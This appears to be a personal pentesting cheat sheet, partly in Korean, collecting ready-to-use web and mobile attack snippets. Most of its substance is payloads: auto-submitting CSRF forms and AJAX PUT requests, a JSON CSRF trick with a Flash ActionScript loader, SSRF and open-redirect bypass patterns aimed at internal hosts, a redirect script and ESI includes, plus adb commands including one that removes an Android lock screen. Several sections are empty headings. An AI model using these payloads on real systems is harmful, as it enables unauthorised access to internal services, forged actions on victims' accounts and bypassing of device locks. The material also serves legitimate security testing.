OnePage CheatSheet



Web Hacking


  • XSS
    • SVG
    • Power
    • ABCD
  • SQLi
    • getSystemInfo
  • CSRF
  • SSRF
  • Path Traversal

Mobile Hacking


  • Android
  • iOS
  • Other

Awesome Technique


  • Bypass Host Validate
  • jjj

Code for Functions


  • HTTP Request / Response
    • Ruby
    • Python
    • Golang
    • Java
    • C
    • Rust
    • Android:Kotlin
    • Android:Java
    • iOS:ObjC
    • iOS:Swift
  • JSON Parsing


Code Snippet


  • Ruby
  • GoLang
  • Javascript
  • HTML/CSS

This is a cheatsheet page that I created for me reference. If you have a payload/code you want to add, tweet or message @hahwul.
Cheers!

추가되었으면 하는 좋은 페이로드.코드가 있다면 제 트위터로 공유해주세요. 감사합니다 :)


Web Hacking

XSS

SQLi

CSRF

GET CSRF

<img style="width:1px;height;1px;" src="csrf url"

POST CSRF

<form method="post" action="csrf url">
<form name="csrf_poc" action="csrf url" method="POST">
<input type="hidden" name="state" value="success">
<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>

PUT/DELETE CSRF

Same domain/Weak CORS

<script>
//JQuery preload (optional)
(function(){
  var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';
  (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);
})();

$.ajax({
    url: "/api/add/0001",
    type: "put",
    data:
        {"security":"false"}
    ,
    headers: {
        "Accept":"application/json, text/plain, */*",
        "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "Referer":"321654",
        "Connection":"keep-alive",
        "Accept-Language":"en-US,en;q=0.5",
        "Accept-Encoding":"gzip, deflate"
    },
    success: function (data) {
        console.info(data);
    }
});
</script>

Rails called pseudo method :: “_method”

<form method="post" ...>
  <input type="hidden" name="_method" value="put" />
...

https://www.hahwul.com/2016/07/web-hacking-putdelete-csrfcross-site.html

JSON CSRF(HTML)

<form action="csrf url" method="POST" enctype="text/plain">
<input name='{"title":123,"content":"hello","board_code":1,"hwul":"' value='bypass"}'>
<input type="submit" value="Attack!">
</form>

=> 

POST /xss.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: text/plain
Content-Length: 65
Referer: http://127.0.0.1/jcsrf.html
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

{"title":123,"content":"hello","board_code":1,"hwul":"=bypass"}

https://www.hahwul.com/2017/05/web-hacking-parameter-padding-for.html

JSON CSRF(SWF)

http[s]://[yourhost-and-path]/test.swf?jsonData=[yourJSON]&php_url=http[s]://[yourhost-and-path]/test.php&endpoint=http[s]://[targethost-and-endpoint]

Action Script code

loder

package
{
   import flash.display.Sprite;
   import flash.events.Event;
   import flash.external.ExternalInterface;
   import flash.net.URLLoader;
   import flash.net.URLRequest;
   import flash.net.URLRequestHeader;

   public class source extends Sprite
   {


      public function source()
      {
         var _loc3_:* = null;
         super();
         var _loc6_:String = this.root.loaderInfo.parameters.jsonData;
         var _loc4_:String = this.root.loaderInfo.parameters.endpoint;
         var _loc1_:String = !!this.root.loaderInfo.parameters.php_url?this.root.loaderInfo.parameters.php_url:"";
         var _loc7_:String = _loc1_ != ""?_loc1_:_loc4_;
         var _loc2_:String = !!this.root.loaderInfo.parameters.ct?this.root.loaderInfo.parameters.ct:"application/json";
         if(_loc1_ != "")
         {
            _loc3_ = new URLRequest(_loc7_ + "?endpoint=" + _loc4_);
         }
         else
         {
            _loc3_ = new URLRequest(_loc7_);
         }
         _loc3_.requestHeaders.push(new URLRequestHeader("Content-Type",_loc2_));
         _loc3_.data = this.root.loaderInfo.parameters.reqmethod == "GET"?"":_loc6_;
         _loc3_.method = !!this.root.loaderInfo.parameters.reqmethod?this.root.loaderInfo.parameters.reqmethod:"POST";
         var _loc5_:URLLoader = new URLLoader();
         _loc5_.addEventListener("complete",eventHandler);
         try
         {
            _loc5_.load(_loc3_);
            return;
         }
         catch(e:Error)
         {
            trace(e);
            return;
         }
      }

      public function eventHandler(param1:Event) : void
      {
         ExternalInterface.call("process",param1.target.data);
      }
   }
}

https://www.hahwul.com/2018/08/attack-json-csrf-with-swfactionscript.html

SSRF

Basic attack

?url=http://localhost/server-status
?url=http://127.0.0.1/server-status
?url=http://internal_domain/page
?url=http://internal_ip(192.138.0.14)/page

Bypass SSRF with speical char

?url=http://allow_domain.internal_domain_or_ip/page
?url=http://allow_domain@internal_domain_or_ip/page
?url=http://internal_domain_or_ip#.allow_domain/page
?url=http://internal_domain_or_ip?.allow_domain/page
?url=http://internal_domain_or_ip\.allow_domain/page
?url=https://ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ = www.hahwul.com

[ List ]
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Bypass SSRF Domain CNAME & A-Record

[ CNAME ]
http://localhost.hahwul.com/server-status

$ nslookup localhost.hahwul.com
localhost.hahwul.com    canonical name = localhost.
Name:    localhost
Address: 127.0.0.1


[ A-Record ]
http://127.hahwul.com/server-status

Bypass SSRF HTTP Redirect

?url=http://your-domain/r.php

[ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>

SSRF with ESIi

<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>

Open Redirect

Basic Attack

?url=https://www.hahwul.com

Open Redirect bypass pattern

?url=https://allow_domain.hahwul.com
?url=https://allow_domain@hahwul.com
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.com

Path Traversal

Mobile Hacking

Android

(adb) run custom scheme

adb shell am start -a android.intent.action.MAIN -n testapp://run

(adb) run activity

adb shell am start -a android.intent.action.MAIN -n com.test.app/MainActivity

(adb) send broadcase

adb shell am broadcast -a android.accounts.LOGIN_ACCOUNTS_CHANGED

(adb) run service

adb shell am startservice -n com.test.app/Service

(adb) install apk

adb install test.apk

(adb) reinstall apk

adb install -r test.apk

(adb) send key input(쿼티로 치기 귀찮을때)

adb shell input text "this text send to mobile keyboard"

(adb) monkey를 이용한 랜덤 이벤트 발생

adb shell monkey -v 300 com.test.app

(adb) delete lock screen pattern

am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task

(frida) bypass pinning

iOS

(command) run custom scheme

open -g /Applications/Safari.app testapp://blahblah; killall Safari

Awesome Technique

Bypass Host Validate

Code for Functions

Code Snippet

가운데정렬

position:absolute;top:50%;left:50%;transform: translate(-50%,-50%)